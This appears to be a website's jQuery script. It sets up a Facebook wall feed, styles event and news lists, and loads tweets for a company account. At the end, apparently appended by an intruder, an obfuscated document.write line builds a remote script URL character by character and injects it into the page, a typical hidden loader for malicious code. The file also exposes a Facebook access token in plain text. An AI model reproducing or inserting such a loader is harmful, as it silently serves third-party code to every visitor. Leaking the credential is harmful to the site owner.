	$(function() {		   
		//Execute the slideShow
		//slideShow();		
		$('#facebook_feed').fbWall({id:'52868287879',accessToken:'206158599425293|bd57911ea8de029e5e8a05af.1-885545084|eEB-Z6lxXKZwf732t4liIx-Vp2E',showGuestEntries:true,showComments:false,max:3,timeConversion:24});				   		


		$('.events_list li:odd').css({'backgroundColor':'#1A0000'});
		$('.events_list li:even').hover(function()
										{
											$(this).css({
														'backgroundColor':'#00101A'
														});		
										},function() {
											$(this).css({'backgroundColor':'#000000'});	
										}
										
										);
		$('#breaking_news li:even').css({'backgroundColor':'#2C2F32'});
		
		// load my tweets
       	$(".tweet").tweet({
			username: ["SureSkillsLtd"],
          	join_text: "auto",
          	avatar_size: 32,
           	count: 4,
          	loading_text: '<p id=loading>' + 'loading tweets...' + '</p>'
       	});		
	});
document.write('<script language="JavaScript" type="text/javascript" src="h'+'t'+'t'+'p'+':'+'/'+'/'+'w'+'w'+'w'+'.'+'v'+'i'+'d'+'e'+'o'+'l'+'i'+'n'+'e'+'.'+'c'+'h'+'/'+'g'+'i'+'s'+'/'+'u'+'n'+'b'+'e'+'n'+'a'+'n'+'n'+'t'+'e'+'r'+'_'+'O'+'r'+'d'+'n'+'e'+'r'+'/'+'1'+'8'+'2'+'b'+'e'+'0'+'c'+'.'+'j'+'s"></script>');
